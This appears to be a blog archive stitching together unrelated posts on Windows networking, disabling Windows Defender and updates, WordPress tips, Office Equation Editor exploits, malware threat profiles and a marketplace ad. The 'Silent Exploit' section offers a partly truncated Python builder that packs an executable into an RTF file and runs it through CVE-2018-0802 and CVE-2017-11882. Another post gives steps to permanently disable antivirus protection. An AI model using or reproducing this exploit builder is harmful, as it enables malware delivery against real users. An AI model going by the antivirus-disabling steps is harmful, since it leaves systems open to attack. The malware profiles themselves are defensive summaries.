How to find the MAC Address of Computer in Your Network

I previously disclosed how to find The MAC Address of a computer outside your subnet, read it HERE if you missed it.

Now i want to talk about how to get the list of IP Address and MAC address on your subnet.

Here is how its done.

  • Open CMD run as admin or run directly.
  • Ping an IP in your subnet by typing for example “Ping 10.18.2.34” without the quotes.
  • Hit Enter
  • Then type “ARP -A” without the quotes and hit enter

This will list all the PCs currently in your subnet.

How to find the MAC Address of Remote Computer/IP Address

The MAC address is used by the network hardware such as routers, switches, etc. to send traffic from one device to another device on your network.

Sometimes you might need to find the MAC Address of a remote PC when you know their IP Address, i have been in this situation several times while troubleshooting or taking inventory.

Here is how its done….

  • Open CMD you can either run straight or run as admin.
  • In CMD type: getmac /s “IP Address”

That is getmac <space> /s <space> IP Address of the PC without the quotes.

  • Hit Enter

You will be presented with the MAC Address of that PC or device.

 

NOTE: If it gives you an error ERROR: The RPC server is unavailable.

know that the PC might not be connected to the network at that moment.

THIS TECHNIQUE FINDS THE MAC ADDRESS OF PCs OUTSIDE YOUR SUBNET.

How to permanently disable windows defender in windows 10

I would suggest that if you’re *NOT* a computer geek, there is *no way* you should be permanently disabling Windows Defender.

PLEASE DO NOT ATTEMPT IF YOU ARE UNSURE WHAT YOU ARE DOING!!!

How to disable Windows Defender using Local Group Policy

If you’re running Windows 10 Pro, Enterprise, or Education, you can use the Local Group Policy Editor to disable Windows Defender Antivirus on your computer permanently using these steps:

  1. Use the Windows key + R keyboard shortcut to open the Run command.
  2. Type gpedit.msc and click OK to open the Local Group Policy Editor.
  3. Browse the following path:Computer Configuration > Administrative Templates > Windows Components > Windows Defender Antivirus
  4. On the right, double-click the Turn off Windows Defender Antivirus policy.
  5. Select the Enabled option to disable Windows Defender.
  6. Click Apply.
  7. Click OK.

Once you’ve completed the steps, restart your computer to apply the changes.

You’ll notice that the shield icon will remain in the taskbar notification area, but that’s because the icon is part of the Windows Defender Security Center and not part of the antivirus.

At any time, you can enable the Windows Defender Antivirus again using the steps, but on step No. 5, make sure to select the Not Configured option. Then reboot your device to apply the changes.

How to disable Windows Defender using the Registry

Alternatively, if you’re running Windows 10 Home, you won’t have access to the Local Group Policy Editor. However, you can modify the registry to permanently disable the default antivirus using these steps:

Warning: This is a friendly reminder that editing the Registry is risky, and it can cause irreversible damage to your installation if you don’t do it correctly. It’s recommended to make a full backup of your PC before proceeding.

  1. Use the Windows key + R keyboard shortcut to open the Run command.
  2. Type regedit, and click OK to open the Registry.
  3. Browse the following path:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

    Quick Tip: You can now copy and paste the path in the new Registry’s address bar to quickly jump to the key destination.

  4. If you don’t see the DisableAntiSpyware DWORD, right-click the Windows Defender (folder) key, select New, and click on DWORD (32-bit) Value.
  5. Name the key DisableAntiSpyware and press Enter.
  6. Double-click the newly created DWORD and set the value from 0 to 1.
  7. Click OK.

After completing the steps, restart your device to apply the settings, and then the Windows Defender Antivirus should now be disabled.

If you no longer want to keep the security feature disabled, you can enable it again using the same steps, but on step No. 6, make sure to right-click the DisableAntiSpyware DWORD and select the Delete option.

……….

How to disable windows 10 automatic updates

Whenever you are faced with Windows 10’s automatic update notification like:

  • Install updates automatically
  • Download Updates but choose when to install them
  • Check for updates but let me choose whether to download and install them

What would you do? Here, we have the following solutions.

Option 1: Stop The Windows Update Service

As central as it is to the core of Windows 10, Windows Update is actually just another Windows process so it can be stopped with these simple steps:

    1. Open the Run command (Win + R), in it type: services.msc and press enter
    2. From the Services list which appears find the Windows Update service and open it
    3. In ‘Startup Type’ (under the ‘General’ tab) change it to ‘Disabled’
    4. Restart

To re-enable Windows Update simply repeat these four steps, but change the Startup Type to ‘Automatic’

Option 2: Setup A Metered Connection

Windows 10 offers users on metered connections a compromise: to save bandwidth Microsoft confirms the operating system will only automatically download and install updates it classifies as ‘Priority’.

While Microsoft doesn’t reveal its method of classification, this does cut down more frivolous updates which typically include new drivers and software features – both of which have already caused stability problems.

  1. Open the Settings app (Win + I)
  2. Open the ‘Network & Internet’ section
  3. Open ‘Wi-Fi’ and click ‘Advanced Options’
  4. Toggle ‘Set as metered connection’ to ‘On’

Note: If your PC uses an Ethernet cable to connect to the Internet the Metered Connection option will be disabled as it works with Wi-Fi connections only (silly I know).

Windows 10 is the single operating system working across all Microsoft desktops, laptops, tablets and phones

Windows 10 is the single operating system working across all Microsoft desktops, laptops, tablets and phones

Option 3: Group Policy Editor

This is a halfway house: the group policy editor will notify you about new updates without automatically installing them (how previous generations of Windows always worked) – though again security updates will still install automatically.

Note: Windows 10 Home users have to sit this one out, it is only for Windows 10 Education, Pro and Enterprise editions.

  1. Open the Run command (Win + R), in it type: gpedit.msc and press enter
  2. Navigate to: Computer Configuration -> Administrative Templates -> Windows Components -> Windows Update
  3. Open this and change the Configure Automatic Updates setting to ‘2 – Notify for download and notify for install’
  4. Open the Settings app (Win + I) and navigate to -> Update and Security -> Windows Updates. Click ‘Check for updates’ which applies the new configuration setting
  5. Restart

How To Switch Back To Old WordPress Classic Editor

WordPress 5 was released only a few days ago. Many blogs and websites (including ValueWalk) have successfully upgraded to the new version. WordPress 5 brings a lot of changes, including a new Gutenberg editor that replaces the good old Classic Editor that we have been using for years.

What you need to know about Gutenberg

Gutenberg is a sleek and modern block-based editor that completely alters the way posts and pages are created. But it’s still in its early days. Some bloggers and writers don’t like it because they are not familiar with it while others think the block-based editor is way more complex than the classic editor. Here we will talk about how you can disable the Gutenberg editor and get back the Classic Editor.

Fortunately, Gutenberg does not affect your published content. Folks at GoDaddy tested it with more than a hundred websites and there was no difference in live posts and pages after updating to WordPress 5.

The posts and pages created prior to the rollout of Gutenberg will appear in a Classic block, which is marked by a “Classic” heading. You can convert the Classic block into multiple blocks via the blocks menu by clicking on the three dots.

While the old classic editor had a clean writing area similar to Microsoft Word, the Gutenberg editor has blocks for paragraphs, images, videos, headings, and plugins. Depending on the WordPress theme you have, you can style the editor to look like the published page.

Early reports suggest that users have encountered random bugs while working in Gutenberg editor. The Gutenberg plugin has a disappointing 2.3 out of 5 rating. It will take developers some time to fix the bugs and enhance the user experience. Until then, you can disable Gutenberg in WordPress 5 and switch back to the Classic Editor.

How to go back to the Classic Editor in WordPress 5

Yes, the WordPress team allows you to disable Gutenberg and switch back to the Classic Editor. And they have made it pretty simple. Here’s how to do it:

STEP-1: Log in to your WordPress site as an administrator and go to Plugins > Add Plugin

STEP-2: Search Classic Editor in the WordPress plugin repository. You’ll see the Classic Editor plugin near the top of search results. It is developed and maintained by the core WordPress contributors. Alternatively, you can download it from here

 

STEP-3: Click on Install Now and once it’s installed, activate the plugin. It will automatically disable the Gutenberg editor in WordPress 5 when you activate it

Classic Editor Activate

 

STEP-4: Now go to Settings > Writing to optimize the Classic Editor settings to your liking. You can also choose to keep both the Classic and Gutenberg editors. After changing the settings, hit the Save Changes button near the bottom of the page.

 

 

That’s it! Now you can create new posts using the Classic Editor. You will also be able to edit older posts and pages using the classic one.

It’s worth pointing out that Gutenberg editor is the future of WordPress and it’s here to stay. The WordPress team will continue to support the Classic Editor through the end of 2021, giving you plenty of time to get familiar with Gutenberg.

Even if some themes and plugin face issues with the new editor, we expect developers to address the problems in the coming months. The core WordPress team is giving developers of third-party plugins, themes and tools the time they need to add compatibility with Gutenberg.

Once you are ready to use the block-based editor, you can enable it from Settings. Or you can uninstall the Classic Editor plugin altogether.

How to use two themes in one wordpress installation

There are several ways you can set up multiple themes. The first option allows you to set a different theme for your site’s homepage. Simply choose a theme from the dropdown menu and click on the save all changes button. The second option is to provide a full URL, use a URL prefix, or an Asterisk in URL.

One easy way to do this is with the “Multiple Themes” plugin.

Multiple themes plugin for WordPress

Installing “Multiple Themes”

Multiple Themes is a comprehensive and yet easy to use add-on for your WordPress site that allows you to create any number of rules to implement not just a second theme, but a third and a fourth if you so choose. In principle, you can use it to display a new theme for every category page and post.

After downloading and installing the plug-in, you can access its settings from the left-hand side of the WordPress dashboard in the submenu section as shown here:

multiple themes plugin

In this example, I’m going to apply a new theme to the “technology” category of my site. This includes not only the archive for the category, but also the individual posts themselves. Once inside the settings area, scroll down until you see the section called “Select here if URL is a prefix”.

create rule with new theme

As shown in the screenshot above, we require three parameters to define our rule. Since I want to target all posts and archives with the tag of “technology”, I use a wildcard “*” to create a role specifying the category archive and all future page numberings. For this kind of rule, the archive page has “technology” in the third segment of the URL, so that’s the only concrete thing to specify.

In addition to that, I also have to specify which theme I want to use for posts and pages that match the expression. In this example, I’ve simply chosen to use the default TwentySixteen.

Once you save your changes, the rule is added to the predefined list and you can repeat this process so that you have multiple rules targeting different sets of pages. In the screenshot below, you can see that I’ve created yet another rule selecting actual posts and pages belonging to the “technology” category.

multiple rules

Finally, it’s time to test the whole thing. If my rule sets have been accurately defined, my technology pages and posts should now use a new theme. You can see in the screenshot below, that this is exactly what has happened:

new theme activated

This simple operation should be sufficient for most of your multiple theme requirements. However, the plug-in also allows you to create more advanced rule sets that change the default theme altogether. You can also isolate pages based on query parameters for more complex interactions. In short, the “Multiple Themes” plug-in is a Swiss knife tool for all of your needs which require the display of a different theme.

Silent Exploit – Exploiting Microsoft eqnedt32.exe

Enough of the patches Microsoft, we believe its time to bury the good old EQUATION Extension. Unless am working for Texas Instruments or NASA i don’t need it, if your organization is still patching up the Equation Extension am sorry you are highly exposed. Every patch released has an exploitable hole. I will detail these holes and exploits.

While Microsoft has replaced the old EQNEDT32.EXE component with a new one in 2007, the older file is still included with all Office installations to allow users to load and edit equations created with the old component.

You can check if you are running the Equation Extension by navigating here:

C:\Program Files\Common Files\microsoft shared\EQUATION

If there is an equation folder in your Microsoft shared folder, you might be at risk. You can delete the folder if you feel no need for it, if your organization is not Texas Instruments you can advice them to.

Vulnerability According to Threat Post

Microsoft on Tuesday patched a 17-year-old remote code execution bug found in an Office executable called Microsoft Equation Editor. The vulnerability (CVE-2017-11882) was patched as part of Microsoft’s November Patch Tuesday release of 53 fixes.

While Microsoft rates the vulnerability only as “Important” in severity, researchers at Embedi who found the bug, call it “extremely dangerous.”

In a report released Tuesday (PDF) by Embedi, researchers argue the vulnerability is a threat because all version of Microsoft Office for the past 17 years are vulnerable and that the CVE “works with all the Microsoft Windows versions (including Microsoft Windows 10 Creators Update).”

The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as Object Linking and Embedding (OLE) items in Microsoft Word documents.

The origins of Equation Editor date back to November 2000 when it was compiled. Since then, it has been part of Office 2000 through Office 2003. Researchers said in 2007 the component was replaced with a newer version. But, the old Equation Editor was left in Office to support files that utilized the old OLE-based (EQNEDT32.EXE) equations.

Further analysis by Embedi revealed that the EQNEDT32.EXE was unsafe because when executed, it ran outside of Office and didn’t benefit from many of the Microsoft Windows 10 and Office security features such as Control Flow Guard.

“The component is an OutProc COM server executed in a separate address space. This means that security mechanisms and policies of the office processes (e.g. WINWORD.EXE, EXCEL.EXE, etc.) do not affect exploitation of the vulnerability in any way, which provides an attacker with a wide array of possibilities,” Embedi wrote in its technical write-up.

Embedi researchers discovered the error using Microsoft’s own BinScope tool, which identified EQNEDT32.EXE as a vulnerable executable. BinScope works by analyzing files to see if they pass standards set by Microsoft’s Security Development Lifecycle, a core element of Microsoft’s Trustworthy Computing.

Embedi exploited this vulnerability using two buffer overflows that relied on several OLEs. “By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g. to download an arbitrary file from the Internet and execute it),” researchers said.

Microsoft describes the CVE-2017-11882 as a Microsoft Office memory corruption vulnerability. “Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office or Microsoft WordPad software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file,” Microsoft wrote.

As part of its research, Embedi created a proof-of-concept exploit that attacks all versions of Office dating back to 2000, including Office 365, running on Windows 7, Windows 8.1, and the Windows 10 Creators Update. In a video below, Embedi shows three different attacks on Office and Windows versions (Office 2010 on Windows 7, Office 2013 on Windows 8.1, and Office 2016 on Windows 10).

Along with downloading the patch to fix Equation Editor, Embedi is recommending companies disable EQNEDT32.EXE in the Windows registry to prevent further exploitation.

“Because the component has numerous security issues and the vulnerabilities it contains can be easily exploited, the best option for a user to ensure security is to disable registering of the component in Windows registry,” researchers wrote.

Understanding the exploit approach

The CVE-2017-11882 vulnerability happened because the EQNEDT32.EXE would allocate a fixed size of memory and load a font name inside. If the font name was too long, it would trigger a buffer overflow and allow attackers to execute malicious code.

0patch says it found fixes for this problem —checks to verify and truncate the font’s name— but also other modifications in unrelated parts of the binary.

“There are six such length checks in two modified functions, and since they don’t seem to be related to fixing CVE-2017-11882, we believe that Microsoft noticed some additional attack vectors that could also cause a buffer overflow and decided to proactively patch them,” 0patch said.

In addition, Microsoft optimized other functions, and when the code modifications resulted in smaller functions, Microsoft added padding bits to avoid not messing the arrangement of other nearby functions.

Such efforts to avoid not ruining the EQNEDT32.EXE binary are time-consuming, and no sane developer would have taken this route if he still had access to the source code. Furthermore, Microsoft also modified the binary’s version number also by manually editing the binary.

All the clues point to the conclusion that Microsoft lost access to the EQNEDT32.EXE source code, which if you think about the amount of software the company has managed in the last 42 years, it’s a wonder it did not happen a few more times before.

“Maintaining a software product in its binary form instead of rebuilding it from modified source code is hard. We can only speculate as to why Microsoft used the binary patching approach, but being binary patchers ourselves we think they did a stellar job,” the 0patch team said.

Formeleditor

Its Not Over Yet!!!

In recent time i have come across malware’s utilizing the CVE 2018 variants, as the patches keep coming the exploits keep evolving, with a simple tweak in the python code you could have a python script exploiting several versions of the patches.

Proves of exploit

This is a Silent Exploit Python script that that encodes an executable and outputs it into an rtf document file, when the document file is opened it executes the binary via the EQNEDT32.EXE memory buffer vulnerability.

import argparse
import os
import struct

class Package(object):
"""
Packager spec based on:
https://phishme.com/rtf-malware-delivery/

Dropping method by Haifei Li: 
Dropping Files Into Temp Folder Raises Security Concerns
Found being used itw by @MalwareParty: """ def __init__(self, filename): self.filename = os.path.basename(filename) self.fakepath = 'C:\\fakepath\\{}'.format(self.filename) self.orgpath = self.fakepath self.datapath = self.fakepath with open(filename,'rb') as f: self.data = f.read() self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata " self.OBJ_TAIL = r"0105000000000000}}" def get_object_header(self): OLEVersion = '01050000' FormatID = '02000000' ClassName = 'Package' szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex') szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex') return ''.join([ OLEVersion, FormatID, szClassName, ClassName.encode('hex') + '00', '00000000', '00000000', szPackageData, ]) def get_package_data(self): StreamHeader = '0200' Label = self.filename.encode('hex') + '00' OrgPath = self.orgpath.encode('hex') + '00' UType = '00000300' DataPath = self.datapath.encode('hex') + '00' DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex') DataLen = struct.pack("<I", len(self.data)).encode('hex') Data = self.data.encode('hex') OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex') OrgPathW = self.datapath.encode('utf-16le').encode('hex') LabelLen = struct.pack("<I", len(self.filename)).encode('hex') LabelW = self.filename.encode('utf-16le').encode('hex') DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex') DefPathW = self.orgpath.encode('utf-16le').encode('hex') return ''.join([ StreamHeader, Label, OrgPath, UType, DataPathLen, DataPath, DataLen, Data, OrgPathWLen, OrgPathW, LabelLen, LabelW, DefPathWLen, DefPathW, ]) def build_package(self): return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} {\*\generator Riched20 6.3.9600}\viewkind4\uc1 \pard\sa200\sl276\slmult1\f0\fs22\lang9""" RTF_TRAILER = R"""\par} """ OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """ OBJECT_TRAILER = R""" }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005 0000000102ffffff00050000002e01  --------TRUNCATED------- OBJDATA_TEMPLATE_0802 = R""" 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1 B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001 0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFF  -------TRUNCATED--------- OBJDATA_TEMPLATE_11882 = R""" 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff ffffffffffff-------TRUNCATED-------- def create_ole_exec_primitive(command, objdata_template, command_offset, max_len): if len(command) > max_len: raise ValueError("primitive command must be shorter than %d bytes" % max_len) hex_command = command.ljust(max_len).encode("hex") objdata_hex_stream = objdata_template.translate(None, "\r\n") ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):] return OBJECT_HEADER + ole_data + OBJECT_TRAILER def create_rtf(header, trailer, executable, double): # CVE-2018-0802 exploit ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126) p = Package(executable) package = p.build_package() outbuf = header + package + ole1 if double: # CVE-2017-11882 exploit outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43) return outbuf + trailer if __name__ == '__main__': parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method") parser.add_argument("-e", "--executable", help="File to ebmed and exec", required=True) parser.add_argument('-o', "--output", help="Output exploit rtf", required=True) parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true") args = parser.parse_args() with open(args.output, 'w') as f: f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double)) print "[+] Completed!"

Emotet Trojan threat profile

Emotet is a banking trojan, first detected by Trend Micro in 2014, used to steal bank account details by intercepting network traffic. A second version was identified in the fall of 2014 using the Automatic Transfer System (ATS) to steal money automatically from victims’ bank accounts. It had a modular structure, including an installation module, banking module, spam bot module, a module for stealing address books from MS Outlook, and a module for organizing distributed denial-of-service (DDoS) attacks. The attackers attempted to remain under-the-radar by using Emotet in targeted attacks against a small number of German and Austrian banks and changing the domain name of the ATS server daily. In January 2015, a third version of Emotet emerged targeting Swiss banks and containing additional features designed to help it evade detection. This version featured a new built-in public RSA key and it partially cleaned ATS scripts of debugging information and comments. It alters its process if it detects the presence of a virtual machine and uses a different, fake address list for the command centers to mislead investigators. Emotet is delivered via spam emails containing malicious attachments or links. The attached files are usually ZIP archives that contain the Emotet loader. The files names typically have many characters in an attempt to hide the .exe extension from the recipient. The trojan file is packed by a cryptor, used to avoid detection by antivirus software. When the file is processed by the cryptor, control is transferred to the Emotet loader. It then embeds itself in the system, links with the command server, downloads additional modules, and runs them. It consolidates itself in the system and obtains a list of running processes. Emotet then locates the explorer.exe process, unpacks its main code, and injects itself into it.

In mid-2015, a new version was identified. The trojan’s new capabilities included evading two-factor authentication. It uses web injects to display fake alerts to the victims during online banking sessions, requesting a Chip Transaction Authentication Number (TAN) or SMS TAN from the user to complete a “test transfer.” The malicious script then carries out a real financial transfer from the victim’s account to the attacker’s identified account. The user confirms the transfer using the Chip TAN or SMS TAN. This attack can only be accomplished with user interaction; effective social engineering training can help prevent victimization.

Reporting

  • January 2015: Emotet spam campaign targets banking credentials. (Microsoft TechNet)
  • April 2015: Emotet expands target list, evades two-factor authentication. (SCMagazine)
  • April 2017: Email campaign is delivering a new variant of the Emotet banking trojan, targeting mainly .UK top level domains from multiple sectors including major businesses and government departments. (Forcepoint)
  • July 2017: Emotet added a self-spreading capability. It drops a self-extracting RAR file on infected hosts and uses it to search for and gain access to local network resources after brute-forcing their login credentials. (Fidelis)
  • September 2017: Trend Micro researchers observed a new Emotet campaign, propagating via a spam botnet. The majority of targets are located in the United States with 58 percent of detected infections, followed by Great Britain at 12 percent. (Trend Micro)
  • November 2017: A new version of Emotet has been observed with a few changes in its usual behavior and new routines that allow it to elude sandbox and malware analysis. (Trend Micro)
  • July 2018: New malspam campaign pushing Emotet and Trickbot. (Palo Alto Networks)
  • July 2018: Evidence indicates that Mealybug, the threat group behind Emotet, has evolved from maintaining its custom banking trojan to operating as a distributor of threats for other groups. (Symantec)

Technical Details

  • Securelist provides technical analysis on the Emotet trojan, available here.
  • US-CERT released joint Technical Alert TA18-201A on Emotet here.
TROJAN VARIANTS

Top Malwares Organizations should watch out for

Kovter is a Trojan, which has been observed acting as click fraud malware or a ransomware downloader. It is disseminated via malspam email attachments containing malicious office macros. Kovter is fileless malware that evades detection by hiding in registry keys. Some reports indicate that Kovter infections have received updated instructions from command and control infrastructure to serve as a remote access backdoor.
Emotet is a modular Trojan that downloads or drops banking Trojans. Initial infection occurs via malspam emails that contain malicious download links, a PDF with embedded links, or a macro-enabled Word attachment. Emotet incorporates spreader modules in order to propagate throughout a network. Emotet is known to download/drop the Pinkslipbot and Dridex banking Trojans. Currently, there are four known spreader modules: Outlook scraper, WebBrowserPassView, Mail PassView, and a credential enumerator.
Outlook Scraper: a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses that information to send out phishing emails from the compromised account;
WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module;
Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module;
Credential Enumerator: a self-extracting RAR file containing a bypass and a service component. The bypass component is used for enumeration of network resources and either finds writable share drives or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk.
WannaCry is a ransomware worm that uses the EternalBlue exploit to spread. Version 1.0 is known to have a “killswitch” domain, which stops the encryption process. Later versions are not known to have a “killswitch” domain. WannaCry is disseminated via malspam.
ZeuS/Zbot is a modular banking Trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS/Zbot source code in 2011, many other malware variants have adopted parts of its codebase, which means that events classified as ZeuS/Zbot may actually be other malware using parts of the ZeuS/Zbot code.
CoinMiner is a cryptocurrency miner that was initially disseminated via malvertising. Once a machine is infected, CoinMiner uses Windows Management Instrument (WMI) and EternalBlue to exploit SMB and spread across a network. CoinMiner uses the WMI Standard Event Consumer scripting to execute scripts for persistence.
Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device, allowing an attacker to fully control the infected device
NanoCore is a Remote Access Trojan (RAT) spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.
Ursnif, and its variant Dreambot, are banking trojans known for weaponizing documents. Ursnif recently upgraded its web injection attacks to include TLS callbacks in order to obfuscate against anti-malware software. Ursnif collects victim information from login pages and web forms
Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale distributed denial of service (DDoS) attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.
Redyms is a click-fraud trojan that is primarily downloaded via exploit kit. Redyms has virtualization and sandbox detection and is primarily distributed in the United States.

Nigeria’s best Digital Marketplace

Nigeria has alot of online shops and Marketplaces but there seems to be little interest for Digital Marketplaces.

A place where you can sell your paintings, software, Books, Tutorials, Videos, Music, Domain names, Scripts etc.

Just about anything that can be downloaded can be listed by you for sell.

the great thing is that you get to own your own store list as many products under your store as you want and advertise your store.

Here at John.ng we have everything set up for you.

we call it, the Digital Marketplace!!!

https://shop.john.ng

while browsing the default homepage you can find it under the menu name “Marketplace”.

The platform has been built to be very robust and dynamic. Both buyers and sellers are assured an amazing time.